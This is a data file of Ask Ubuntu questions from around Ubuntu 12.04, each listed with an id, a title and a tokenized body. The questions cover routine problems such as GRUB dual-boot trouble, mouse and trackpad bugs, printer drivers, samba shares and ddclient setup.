186123	impossible to select folders and files with mouse on 12.04	my problem is very simple apparently but a tricky one . i just installed the ubuntu 12.04 ( 1 ) along with the gnome3-shell environment on my new pc desktop acer aspire x3995 ( see config below ) . everything work ( more or less ) so far ( i still have problems of sound and disabled 2-fingers gestures with my screen -- which i will have to deal with xconfig settings i think -- though ) , but the main problem is that i can not select files/folders with my usb mouse . when i try to double click on them , nothing happen ( sometimes one folder or file is selected but then unselected again ) . note that the navigation works perfectly from the usb keyboard and from the touch-screen . ( i am using a 23 '' wide touch-screen acer monitor t231hbmid ) . also , the mouse works perfectly with other menu navigation , with the only difference that the text of certain menus is selected as if i was holding the left click on them . so i assume the problem is only related to the mouse . needless to say that the usual basic hardware checks have been performed ( unplugging , powered-off , etc. ) . my level is simply `` advanced user '' , meaning that if you provide me with intelligible input i should find my way , but please do n't expect too much technical/specific knowledge . please let me know if you need more information on this bug . config of acer aspire x3995 : ubuntu 12.04 / gnome3-shell environment / intel core i5 3450 / nvidia geforce 605 , 1gb . screen : acer monitor tft 23 '' wide t231hbmid
186124	can you tell me if ubuntu 12.04 lts will work with my system ?	my computer 's specification is : 5 gb ram ddr1 video card is ati radeon 1 gb the cpu is intel pentium 4 dual core 3,0ghz the operating system is windows 7 ultimate 32bit can you tell me if this will work please ?
186125	how do i install rigs of rods ?	how do i install rigs of rods ( open source vehicle simulator based on soft-body physics ) ? i have compiled applications before like gedit , handbrake , xbmc but i ca n't seem to install/compile rigs of rods ( and some of its dependencies ) . this proves to be quite the challenge for me . i also read rigs of rods wiki on how to compile in linux but no luck . i am using ubuntu 12.04 64-bit .
186131	how do i use dd to clone an external usb drive installation to a local hard disk ?	can i use the dd command to clone my ubuntu installation from my external disk to my local hard drive . will it even boot ? i think i can , but not sure . do i need to make the output partition on my local disk the exact size as the input partition on the usb ? i 'm thinking install and boot off a liveusb on a different small flash drive and run something like sudo dd if=/media/usbexternaldisk of=/media/localdisk would that work as is ? also if i make an iso image of my external ubuntu installation using dd , can i burn it onto disk or unto another hard drive and have that boot up ?
186132	how do i make ubuntu go past the splash screen ?	i recently upgraded my desktop mac to precise and now ca n't get past the ubuntu 12.04 splash page . the splash freezes with ubuntu and the dots turning from white to orange forever . this is when i choose 3.2.0-generic from the grub menu . if i choose to load up older kernels , i still get the same thing . how can i make my computer finish booting again ? i 'm able to ssh into the machine and poke around , but the actual screen freezes at the splash . dmesg cat kern.log
186134	ubuntu 12.04 kde , kmix - how to set audio 2.1 surround profile output	i installed kde in ubuntu 12.04 . in gnome i could choose audio profile method 4.1 that worked well for my 2.1 system , but now with kmix i ca n't find it ? how to set 2.1 . if i set simple `` analog stereo output '' i 'm not able to hear subwoofer and songs listening is different from windows 7 . can you help me ? thanks
186137	how can i hide a windows drive ?	i have a partition with system files , boots etc . ( i have lenovo g570 , and it came with this partition . it is 200 mb partition , without a letter ) . on the window os , it hides all this drive , so i can not see it . i do n't want to see it when i use ubuntu os , how can i make it disappear ? p.s . i use wubi
186140	can not see boot options after editing grub background	after solving this problem i managed to get myself into truble again out of nothing by trying to change the display of the dual boot option page in boot customizer . i have changed the background , the fonts size ( i have increased them ) and font style ( i have chosen undotum ) . but boot customizer gave me an error ( i mean a message that the application was closed unexpectedly or smth ) . i have restarted bootcustomizer and the settings were there . when i rebooted , instead of the normal boot options list , just the background image that i had selected and nothing else . i used boot repair to repair grub , it says it did it successfully , but i still get the background image when i try to boot . any ideas ? ( could it be the matter that i chose undotum font style ? that was installed in lubuntu - but how could it be accessible in displaying boot options ? ) the contents of etc/default/grub are : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' i have tried to modify etc/default/grub : grub_hidden_timeout=0 to 10 grub_hidden_timeout_quiet=true to false and grub_cmdline_linux_default= '' quiet splash '' to `` '' but it does n't help also , using shift does n't make the list visible . i am looking for something like a command that would reset grub options to default .
186141	bi-directional synchronization of folders on two ( or more ) machines	at the moment my setup is the following : i have a `` file server '' machine with the files on it and the laptop connects on each boot via sshfs to a directory on the fileserver . i work on both machines on those files . now i would like to have a physical copy of those files on the laptop , so i can work off site . when the laptop gets back on the network i want it to synchronize the files back to the `` fileserver '' . while in the network i want both machines to recognize changes in that folder by themself and synchronize them as needed . this setup should delete files that are deleted on either side and synchronize changes . i tried incron but failed to set it up so that the folder in question is synchronized recursively - seems that incron is unable to do that . i on the other side do n't know what subfolders will be created and do n't want to reconfigure the system every time i change something . i tried dropbox of course , thats basically the effect i want to achieve - but it 's limited in file size and online . the file synchronization even in a local network somehow never works without dropbox being online . is there any way to achieve some `` cloud like '' environment without much configuration ?
186142	unable to upgrade 11.04 to 11.10	i have ubuntu 11.04 installed in my laptop and tried to upgrade it by opening the update manager and and making the necessary settings in settings - updates - release upgrade - normal releases and then hitting the check button . but nothing appeared indicating later version is available to be upgraded . when i run the following sudo apt-get dist-upgrade below is the result that appeared . reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . also i am unable to watch youtube videos in the firefox 15.0 in my ubuntu 11.04 .
186143	how do i prevent my filesystems from being mounted read-only after suspending ?	i have ubuntu 12.04 installed on an sdhc card ( only one ext2 partition , no swap ) . when i suspend using pm-suspend , my root filesystem is mounted read-only . i am currently `` fixing '' this with the following file : /etc/pm/sleep.d/99_make_disk_rw : # ! /bin/sh mount -o remount , rw / but the disk is marked as needing an fsck on reboot . how can i prevent the filesystem from being mounted read-only or whatever is going wrong here . update : it looks like it is getting mounted read-only because an error occurred . i have changed the mount options for / in /etc/fstab to noatime , nodiratime , errors=continue and it no longer mounts the sdhc card as read-only after it resumes . so the problem is happening when it suspends , not when it resumes as i had thought . i checked /sys/bus/usb/devices/1-4/power/persist and it is set to 1 . so the sdhc card should n't appear disconnected to the os ( or more accurately it should recover from the disconnection without error ) . here seems to be the relevant section of the syslog sep 10 10:34:23 iubit kernel : [ 748.246226 ] sd 4:0:0:0 : [ sdb ] media changed sep 10 10:34:23 iubit kernel : [ 748.246234 ] sd 4:0:0:0 : [ sdb ] result : hostbyte=did_ok driverbyte=driver_sense sep 10 10:34:23 iubit kernel : [ 748.246243 ] sd 4:0:0:0 : [ sdb ] sense key : unit attention [ current ] sep 10 10:34:23 iubit kernel : [ 748.246253 ] info fld=0x0 sep 10 10:34:23 iubit kernel : [ 748.246258 ] sd 4:0:0:0 : [ sdb ] add . sense : not ready to ready change , medium may have changed sep 10 10:34:23 iubit kernel : [ 748.246271 ] sd 4:0:0:0 : [ sdb ] cdb : read ( 10 ) : 28 00 00 5d 3e f0 00 00 08 00 sep 10 10:34:23 iubit kernel : [ 748.246291 ] end_request : i/o error , dev sdb , sector 6110960 sep 10 10:34:23 iubit kernel : [ 748.247027 ] ext2-fs ( sdb1 ) : error : ext2_fsync : detected io error when writing metadata buffers sep 10 10:34:23 iubit anacron [ 6954 ] : anacron 2.3 started on 2012-09-10 sep 10 10:34:23 iubit anacron [ 6954 ] : normal exit ( 0 jobs run ) sep 10 10:34:24 iubit laptop-mode : laptop mode sep 10 10:34:24 iubit laptop-mode : enabled , not active sep 10 10:34:24 iubit kernel : [ 749.055376 ] sd 4:0:0:0 : [ sdb ] no caching mode page present sep 10 10:34:24 iubit kernel : [ 749.055387 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through sep 10 10:34:25 iubit anacron [ 7555 ] : anacron 2.3 started on 2012-09-10 sep 10 10:34:25 iubit anacron [ 7555 ] : normal exit ( 0 jobs run ) sep 10 10:34:31 iubit kernel : [ 756.090861 ] ext2-fs ( sdb1 ) : previous i/o error to superblock detected
186146	is the lightning 1.7 calendar for thunderbird not supported on 10.04 ?	this page makes me think that lightning 1.7 is now unsupported on ubuntu lucid , but i could n't find any official announce about it ... moreover , i ca n't find a way to a question to the team : ( so , is lightning officially unsupported or is it just an overlook ?
186149	error with `` apport ''	i have an error with apport that has persisted over ubuntu 11.10 , 12.04 and 12.10 . i have reported a bug but this is only happening in one of my systems , only in one account and not when i run it with sudo , so it is hard that anybody will look at this problem . so my question is if anybody knows what configuration files of apport may be causing this error ( i put the full description below ) . i 'm reluctant to create a new account and move all my stuff there just because of this , it must be something in my user account that causes this error but i have n't been able to identify any apport specific file in my home directory . here is the description of the error that apport gives : whenever i run anything related to apport ( ubuntu-bug , etc ) , it aborts with a window that says nothing to repeat . if i run it from the terminal i get : .traceback ( most recent call last ) : file `` /usr/bin/apport-cli '' , line 365 , in if not app.run_argv ( ) : file `` /usr/lib/python2.7/dist-packages/apport/ui.py '' , line 543 , in run_argv return self.run_report_bug ( ) file `` /usr/lib/python2.7/dist-packages/apport/ui.py '' , line 348 , in run_report_bug self.collect_info ( symptom_script ) file `` /usr/lib/python2.7/dist-packages/apport/ui.py '' , line 912 , in collect_info anonymize_thread.exc_raise ( ) file `` /usr/lib/python2.7/dist-packages/apport/rethread.py '' , line 34 , in run self._retval = self.__target ( *self.__args , **self.__kwargs ) file `` /usr/lib/python2.7/dist-packages/apport/report.py '' , line 1297 , in anonymize replacements.append ( ( re.compile ( '\\b % s\\b ' % s ) , 'user name ' ) ) file `` /usr/lib/python2.7/re.py '' , line 190 , in compile return _compile ( pattern , flags ) file `` /usr/lib/python2.7/re.py '' , line 242 , in _compile raise error , v # invalid expression sre_constants.error : nothing to repeat
186150	folder permissions keep changing from www-data to root	a folder under the directory /var/www/xml keeps changing permission from www-data to root meaning that no php file is able to write into the folder . this seems to happen when i restart the server . drwxr-xr-x 6 root www-data 4096 sep 10 13:40 xml chown www-data -r /var/www/xml drwxr-xr-x 6 www-data www-data 4096 sep 10 13:40 xml how do i make sure this does not happen ?
186163	mount loop restarts unity	i have a dvd iso file and need to mount it before i can play with totem/vlc . everytime i process this command : mount /path/dvd.iso /mnt/python/ -o loop unity restarts itself ( something like 'unity -- replace ' command ) how to fix or is this a bug ?
186166	start vlc with playback speed increased	i know that i can change the setting for playback in settings and this will affect vlc globally . however , i do n't want every file to be played faster , only mp4 files . therefore , i figure i can setup a separate application .desktop file with a custom command that can set the playback speed on start . does anybody know the configuration setting in command-line to increase playback speed ? thanks !
186171	i need some help setting up a dual boot	i have a new computer with a blank hd my old computer has a nice ssd with my ubuntu 12.04 system on it . i want to put my ssd into the new machine as the primary drive , then i want to install win7 on the blank hd ( ntfs ) , and set them up to dual boot . is this feasible ? or do i need to reinstall ubuntu and start from scratch ? if it 's possible , can someone give me some pointers on things i would need to configure , and/or a tutorial ? i 'm guessing i need to re-config my grub to see both drives/oss but i 'm not sure how to do that . i found a couple of tuts but nothing that quite matches my situation ... i 'm fairly proficient with linux , but this is a bit out of the norm for me .
186174	automount usb drive in virtualbox via udev in ubuntu 12.04	how do you automount usb drives directly to virtualbox in ubuntu 12.04
186176	how to disable recovery mode/single user mode ?	i am making installation for school computers . i would like to remove single user mode booting , which can make student root user . how to permanently remove single user / recovery mode from grub ? i am also concerned with updating kernel ( update-grub ) i do need grub for booting into windows installation .
186178	why does restarting my laptop does not give me an option to go to ubuntu ?	yesterday i installed ubuntu 12.04.1 64bit in my laptop with windows 7 . the installation was dual . i did the required partition and kept a free space for linux . i gave the appropriate space for swap area and ext4 . ubuntu got installed well . then finally after installation , i was asked to reboot my system . while rebooting , as we expect , the system should ask me whether i want to start windows or linux . but it did'nt ask me any of it . the system directly takes me to windows without giving me any option for linux . i tried restarting again , but i was directly taken to windows . can you help me know this ? did i go wrong somewhere with my installation ? how can i correct it and get to linux ? thanks in advance.. i thank you for your reply . i am not sure in which partition did i install my grub . honestly this is really new to me . i am trying to follow the instructions mentioned in the link you provided . it is really a clear description on how to install ubuntu step by step . but however , i am stuck at using the `` easybcd '' tool . i have tried installing several times , but after installing , when i try to run it , it gives me an error saying , '' error opening bcd registry '' i have attached the image as well . could you give me an alternative ? or any way to resolve that ?
186183	how to extract a list of all devices that were connected to my pc before ?	how to know what usb devices had connected to my ubuntu 12.04 pc . i 've read this but i did n't get satisfied since i dont know how to deal with the log file to collect the data i need . also , i want to search for old connected usbs not during real time . that is , i want a tool or any way that manage and monitor which usbs is connected to my pc .
186185	i want to access internet on ubuntu 12.04.1 guest system from windows 7 64bit host in virtualbox 4.1.18 how to do so ?	i am using windows 7 64bit as host system and i have installed ubuntu 12.04.1 in virtual box as stated above . i have a dsl connection which works well on my host system and now i need to access the same connection on my guest ubuntu . i cant see any such settings in ubuntu . i am total biginner and dont know anything about linux . win 7 is showing unknown network . please guide me from the scratch . thank you . yeah thats the thing . it is nat but i could not see that the network is working fine . win 7 says unidentified network . so they are not yet networked and i thing it should be networking and internet access sharing to be done . please guide . thank you . and now its working fine without any change made by me or anyone . i dont know what is this miracle any idea ?
186186	parallel port problem in 12.04	i have a “dumb” printer attached to a parallel port in my machine which works fine under the “other” resident operating system ( from redmond ) on the same machine . i recently added ubuntu 12.04 as a dual boot on the machine , but ubuntu does n't seem to recognize the parallel port at all . all i need to set up a printer is a really plain-vanilla fixed pitch text-only generic driver , which is present , but no parallel ports show up . ( the other printers , all on usb ports , seem to work just fine ) . following what appeared to me to be the most reasonable of the many conflicting pieces of advice on the web , here 's what i did : i added the following lines to /etc/modules parport_pc ppdev parport then , after rebooting , i checked to see that the lines were still present , and they were . i ran dmesg | grep par and got the following references in the output that seemed like they might have to do with the parallel port : [ 14.169511 ] parport_pc 0000:03:07.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 14.169516 ] pci parallel port detected : 9710:9805 , i/o at 0xce00 ( 0xcd00 ) , irq 21 [ 14.169577 ] parport0 : pc-style at 0xce00 ( 0xcd00 ) , irq 21 , using fifo [ pcspp , tristate , compat , ecp ] [ 14.354254 ] lp0 : using parport0 ( interrupt-driven ) . [ 14.571358 ] ppdev : user-space parallel port driver [ 16.588304 ] type=1400 audit ( 1347226670.386:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=964 comm= '' apparmor_parser '' [ 16.588756 ] type=1400 audit ( 1347226670.386:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=964 comm= '' apparmor_parser '' [ 16.673679 ] type=1400 audit ( 1347226670.470:7 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1010 comm= '' apparmor_parser '' [ 16.675252 ] type=1400 audit ( 1347226670.470:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=1014 comm= '' apparmor_parser '' [ 16.675716 ] type=1400 audit ( 1347226670.470:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=1014 comm= '' apparmor_parser '' [ 16.676636 ] type=1400 audit ( 1347226670.474:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1015 comm= '' apparmor_parser '' [ 16.677124 ] type=1400 audit ( 1347226670.474:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=1015 comm= '' apparmor_parser '' [ 1545.725328 ] parport0 : ppdev0 forgot to release port i have no idea what any of that means , but the line “parport0 : ppdev0 forgot to release port ” seems unusual . i was still unable to add a printer for my old clunker , so i tried the direct approach , typing echo “hello” > /dev/lp0 and received a permission denied message . i then tried echo “hello” > /dev/parport0 which did n't give me any message at all , but still did n't print anything . running the command sudo /usr/lib/cups/backend/parallel gives the following : direct parallel : /dev/lp0 `` unknown '' `` lpt # 1 '' `` '' `` '' checking the permissions for /dev/parport0 , owner , group , and other are all set to read and write . crw-rw -- -- 1 root lp 6 , 0 sep 9 16:37 /dev/lp0 crw-rw-rw- 1 root lp 99 , 0 sep 9 16:37 /dev/parport0 the output of the command lpinfo -v includes the following line : direct parallel : /dev/lp0 i 've read several web postings that seem to suggest this has been a problem for several years , but the bug reports were closed because there was n't enough information to address the issue ( shades of microsoft ! ) . any suggestions as to what i might be missing here ?
186191	mix down 5.1 ac3 to stereo wav ?	i wonder if i can mix down a 5.1 ac3 file to stereo wav file , i.e . 6-channel > 2-channel . i 'd like to know how to do this with via terminal with ffmpeg ( or avconv , because it says ffmpeg is deprecated ) .
186192	the `` additional drivers '' shows nothing	i started using ubuntu 32 bit last week . i love it but i recognized there was a problem with the cooling system . the fan does n't stop and slightly loud all the time ( that was n't the case while running with windows 7 ) . i told a friend who claimed that it should be a drivers problem . my machine is dell inspiron n5110 and the official site recommends win 7 64 bit only . there 's no support for linux . ( the page showing the machine drivers and system recommendation i tried to fix the problem using the `` additional drivers '' , it opens but it shows nothing ( no drivers to activate , just the help and the close buttons ) is there a way to fix this ?
186193	deleted partition recovery	i was installing ubuntu 12.04 on my system . there were 4 partitions on my system and i selected one of the four partition for the installation and chose the option of resizing the partition . initially my partition was of size 100+gb and i created another partition out of it of size 15gb ( ext4 ) . now the moment i changed this partition structure my original partition got lost along with its data and i am left with 50gb partition and 50gb unallocated free space . now the data that i have lost is meant a lot to me and i want to recover that data . so is there any way i can recover it ? and i have n't checked `` format '' option while resizing the partition .
186197	syslog/kernlog filling up with `` did not claim interface n before use ''	as i discovered when asking this question , it appears that demond_nscan is trying to use a device without claiming it . and it does it ... . hundreds of time per second apparently . this makes kern.log and syslog huge ( 100gb > ) . in this particular case the problem is directly a result of some lexmark drivers that were installed ( found at /usr/local/lexmark/unix_scan_drivers/bin/demond_nscan ) . here are a few things i know : the drivers are for an all-in-one printer/scanner device . there was a previous lexmark printer-only that was installed with cups this driver was the one for cups systems , and i think that it automatically added it to the list of printers in cups . the issue started spamming kern/syslog only after these drivers were installed , using the lexmark installers while googling around i found this thread that 's not completely related , but it does mention that it might be happening when two drivers try to control the same device at the same time . how can i resolve this issue so that either i only have one driver , or get the driver to claim the device before usage ?
186204	how to activate wifi when it says `` disabled by hardware switch '' ?	i have vaio vpcea23en with ubuntu 12.04 32 bit . bluetooth is working but not wifi . it says `` disabled by hardware switch '' even when it 's enabled .
186205	how to reset notification area settings ?	i am running xubuntu with xfce and today i accidentally removed an icon from the notification area that provided quick access to thunderbird and pidgin chats . is there a way to restore that icon or to restore the whole notification area to default settings ? i marked the icon in question on the screenshot : apparently , i lost the volume icon , too . update : apparently , i used the wrong nomenclature in my question . the icons i lost were not part of the notification area . they are a separate applet item called indicator plugin . i found the icon on this very site
186209	c++ development cinder/visual studio	i 'm currently taking a data structures course that involves the development of c++ applications using microsoft visual studio express c++ , an application called cinder , and we turn in assignments via github . i know mac users in the class use x code to develop to our needs although some small issues arise with compilation that needs some debug work to be done . windows just is n't cutting it for me anymore ... i 've welcomed myself to the darkside ... i 'm wondering if linux distros have any development tools that would be compatible to create and run these types of applications ?
186212	dual-boot windows/linux update troubleshooting ?	my 2-year-old thinkpad has a windows 7 and linux dual-boot . recently , i updated the os from 11.10 ( oneiric ocelot ) to 12.04 ( precise pangolin ) . after updating , the desktop screen is completely black when i boot . what can i do to resolve these issues ?
186213	how do i get the guayadeque icon to work with the indicator applet in gnome classic ?	the taskbar icon keeps popping up right over my close window buttons in ubuntu 12.04 with gnome classic . is there a way to get it in the indicator applet , or to remember where i place it ? also , is there a way to get it to remember it 's `` always on top '' setting ? it 's kinda annoying for it to fall behind other windows .
186215	firefox hang for 4 or 5 second when loading	i am using firefox 15 in ubuntu 12.04 but it hangs for 4 or 5 second the browser became dark when loading anything .
186218	closing the lid does n't suspend the laptop in xubuntu but it does in ubuntu 12.04	hi i have a hp laptop dv6 . when i use ubuntu 12.04 and close the lid , the laptop suspends . however that does not happen when i switch to xubuntu 12.04 ? what should i do to solve this problem ? may be play with the config file ? but where to find them ?
186220	ca n't change destination of symbolic link	i want to change the destination of an existing symbolic link , without removing the link or the old destination . i have previously created a symbolic link to a directory such as follows : $ cd /usr/lib/jvm/ $ ls -lh drwxr-xr-x 8 uucp 143 4.0k sep 10 20:22 jdk1.7.0_04 drwxr-xr-x 8 uucp 143 4.0k aug 29 05:42 jdk1.7.0_07 $ sudo ln -s jdk1.7.0_04 oracle-jdk-7 $ ls -lh drwxr-xr-x 8 uucp 143 4.0k sep 10 20:22 jdk1.7.0_04 drwxr-xr-x 8 uucp 143 4.0k aug 29 05:42 jdk1.7.0_07 lrwxrwxrwx 1 root root 12 may 11 11:27 oracle-jdk-7 - > jdk1.7.0_04/ now i want to change this , to link to the other directory : $ sudo ln -- force -s jdk1.7.0_07 oracle-jdk-7 but it does n't work without any errors : $ ls -lh drwxr-xr-x 8 uucp 143 4.0k sep 10 20:36 jdk1.7.0_04 drwxr-xr-x 8 uucp 143 4.0k aug 29 05:42 jdk1.7.0_07 lrwxrwxrwx 1 root root 12 may 11 11:27 oracle-jdk-7 - > jdk1.7.0_04/ any help ?
186222	bug fix for the ddclient `` invalid ip '' error not working	i 'm running ubuntu server 12.04 on a mid-2009 macbook pro and using ddclient to update my ip address at www.no-ip.com . after installing ddclient according to the instructions here i had one successful update but none since . my /etc/ddclient.conf looks like this : daemon=3600 pid=/var/run/ddclient.pid # use=if , if=eth0 use=web , web=checkip.dyndns.com/ , web-skip='ip address' protocol=noip ssl=yes server=dynupdate.no-ip.com/nic/update login=jdoe password='jdoespassword' isauron.myftp.org when i run sudo ddclient -daemon=0 -debug -verbose -noquiet i get : warning : file /var/cache/ddclient/ddclient.cache , line 3 : invalid value for keyword 'ip ' = '' ... warning : skipping update of home from < nothing > to [ real ip ] . warning : last updated < never > but last attempt on mon sep 10 09:06:05 2012 failed . i 've tried the solution described in this thread but after running both commands that izx mentions and restarting , the error above still persists thus leaving me unable to update my ip . any ideas as to what could be going on ? and is there another way to apply the suggested patch ? thank you !
186225	how to make apache2 use php 5.4.5 compiled from source ?	as most of us ubuntu users know , 12.04 comes with it 's own version of perl and php ( 5.3.10 ) . recently i compiled apache 2.2.22 and php 5.4.5 from source , and when i open a terminal to php -v , it shows 5.4.5 . however in phpinfo ( ) it shows the preinstalled 5.3.10 which means apache2 is using that version . do i have to remove 5.3.10 ? or configure apache2 so that it uses php 5.4.5 ? if i 'm supposed to configure it , please do tell me how , and what to sudo nano . btw it is only for learning html/css/php , and i 'm on ubuntu 12.04 desktop .
186228	picture but no sound when connecting to a tv	i get a good image of the desktop on the tv , but no sound , i 'm using a vga and audio cables to connect a samsung netbook to a samsung tv - do i need to do something on the netbook ? andy murray is in the us open final and we have no sound - please help !
186230	presumed grub screen is `` out of range '' . what do i press for windows ?	i was going to try ubuntu 12.04 lts alongside my normal windows 7 . installed it from an usb.stick but now my startupscreen is complaining about it being out of range . i 've tried to push cursors and enter , but only found something about grub ( ? ) and system recovery . if someone could guide me through the nonvisible screenchoises i would be very happy ! ( and if i ca n't get my win7 back , is there some way of recovering my files and stuff from inside ubuntu ? )
186232	print jobs are held until the virtualbox guest os is reboot	here is the setup : virtualbox 4.1.20 ( which the help window describes as 4.1.12_ubuntu ) extension pack 4.1.20 ( for usb support ) windows 7 home premium as a guest operating system on virtualbox virtualbox guest additions for shared drive support ubuntu 12.04 with dist-upgrade 's to september 2012 as the host operating system . fuji xerox docuprint p205b , which i believe is a gdi printer , connected via usb . a usb filter added to the virtualbox setup . this filter is simply selected , so it 's details are automatically determined by virtualbox and proprietary : it has fj docuprint p205b values . the virtualbox devices > usb menu has the usb printer device checked , which i take to mean that it is passed through from the host to the guest . the virtualbox task bar shows it is aware of the usb device when the cursor hovers over the usb icon . the problem is that often print jobs will sit in the print queue and nothing comes out of the printer . the printer status for the first item in the queue will be printing even though nothing happens . then upon rebooting windows , the print jobs get printed , seemingly simultaneous to the rebooting process ; that is as windows reloads . one way to avoid this problem is to boot windows with the printer cable attached , and then submit the print jobs . in this scenario , the print jobs get printed in a timely manner . perhaps virtualbox has a problem with usb being plug-n-play and hot pluggable . windows standing alone does not have this problem . i know this because i have installed and used this printer driver on several windows-only as well as grub dual-boot systems many times . this problem has only been seen inside virtualbox , and as i said my virtualbox is on ubuntu . it 's not convenient to have the printer plugged in when windows boots because : one , this is a laptop , and two , i may boot windows for a purpose other than printing and not anticipate needing to print . are there any recommendable fixes for this problem ? edit when there are jobs stuck in the print queue , go to the virtualbox menu to select devices > usb devices and cycle the state of the usb device that is the fuji xerox docuprint p205b . that is to say : uncheck and then check the device . this will cause the queued print jobs to complete , sometimes . i have had very limited success with this workaround .
186236	how to merge both audio channels into left channel ?	my headset broke recently and now only left side of it works . in some songs , there are parts that are only played through the right side and since my right side does n't work , i ca n't hear them . i want to set the sound so it only plays on the left side . i tried changing the balance settings in sound preferences , but it only mutes the right channel , does n't make it play through the left channel . how can i do this ?
186239	file share not able to be seen except by creator	i have a samba file share that i can see from a windows machine . the problem is when i create files or folders , only the creator machine can see them . i can create windows files but can not see them in ubuntu . i can create files on ubuntu but can not see them in windows . i am thinking it is some permissions in the smb.conf file but am having issues figuring it out . my main goal is to use this as a media server so the windows boxes , tv and dvd players should be able to connect and see the files without passwords . also i 'd like to upload content from any machine and have it accessible to any machine on the network .
186242	can i make a downloaded file 's folder be opened after axel ended its job ?	i prefer using axel in firefox through flashgot but did n't yet make it the default , and keep it just for bigger files , because i can not easily open the download folder as i can in the normal firefox window with a right-click , and so using it for all files is cumbersome . can i have this option while using axel , maybe using a gui for axel that would display a list of downloads ? as i am in xfce and use thunar , maybe the de and the file manager are important variables to be considered .
186244	mouse clicking issues	i finally got ubuntu 12.04 installed after figuring out what the problem was . for some reason , mouse clicks are n't always registered correctly so i had to use the arrows , tab and space to select and change options . now in ubuntu i got the same problem . the mouse moves around perfectly , and in the active window i can do everything but it 's a real pain to get something else clicked outside of that window .
186246	how do i turn off global application support libre office ?	i am using 12.10 and libre office has global menu support turned on by default . since i use gnome-shell and not unity , i ca n't find a way to turn off this `` feature '' .
186247	why is n't cluster-ssh working on ubuntu server ?	i have installed cluster-ssh on my ubuntu 10.04 server , it has a dependency of xterm_261-1_amd64 . when i try to $ cssh localhost it says ocpe @ blrkec241933d : ~ $ cssh localhost connect /tmp/.x11-unix/x0 : no such file or directory and when i try to open xterm it says . ocpe @ blrkec241933d : ~ $ xtermconnect /tmp/.x11-unix/x0 : no such file or directory xterm xt error : ca n't open display : localhost:10.0 is it coz ubuntu server does not have any ui ? ? ? ? . i just log into it through putty from my windows machine and work . i dont have any idea , if at all i can fix it.. plz help .
186249	hard disk problems ( bad sectors )	in my workplace , i 've 10 ubuntu desktop systems working . this is a custom made project started in 2010 in which we have 10 computers in a factory , installed on a some-kind-of-portable-station-work . in this time i 've had 3 w.d . hard disks broken , in each laptop . these computers are operating 24/7 and is not usual to shutdown ou hibernate . thus , the computers are moved in a portable-station-network while on . do you know any tools , or maintenance procedures that should be made in order to minimize this problems ? hope i 've made the question in the right place ! : ) thks ! djames
186250	boot into windows after uninstalling ubuntu ( dual-boot )	i had a windows 7/ubuntu dual-boot set up on my laptop . i deleted ubuntu , and when i load up my computer , i am now met with a screen displaying the following : error : no such partition . grub rescue > how can i have my computer boot straight into windows 7 again ? solved : i created a win7 system repair disc using another machine , and fixed the problem using the bootrec command within command prompt .
186258	how can i tell ubuntu to ignore mouse movements while clicking ?	i 've got a macbook air and am trying out ubuntu on it . one thing that is really annoying is the behavior of the trackpad . macs have those click-pads , where you have to press down the whole trackpad for a click . this works , but ubuntu does n't ignore the movement while clicking . this leads to moving the mouse pointer a few pixels every time i try to click , which is really annoying . is there a setting to make ubuntu ignore movement while clicking ?
186264	lost iceauthority afer password change	i changed my password then chnaged it back again . now i cant get back into my user adnin message ... could not update iceauthority file/home/username/.iceauthority this has probably been covered can somone point
186265	ca n't wakeup after lid was closed	i change my settings to `` when lid closed - > nothing '' , but when lid closed , it go to suspend and i ca n't restore it , when press any button . effect after pressed is not restore , but reloading or hangover . how to solve it ?
186267	how can i install canon pixma ip100 driver for ubuntu 12.04lts 64bit ?	i tried installing the driver by typing the following commands in the terminal : sudo add-apt-repository ppa : michael-gruz/canon the result was the following : you are about to add the following ppa to your system : more info : https : //launchpad.net/~michael-gruz/+archive/canon press [ enter ] to continue or ctrl-c to cancel adding it then i typed : sudo apt-get update and the result was the following : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.hduhmosj0l -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 84e550cd36ec35430a66ac5a03396e1c3f7b4a1d gpg : requesting key 3f7b4a1d from hkp server keyserver.ubuntu.com gpg : key 3f7b4a1d : `` launchpad misakovi '' not changed gpg : total number processed : 1 gpg : unchanged : 1 i typed the next command : sudo apt-get install cnijfilter-ip100series the return response was : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cnijfilter-ip100series does anyone know the solution ? kina
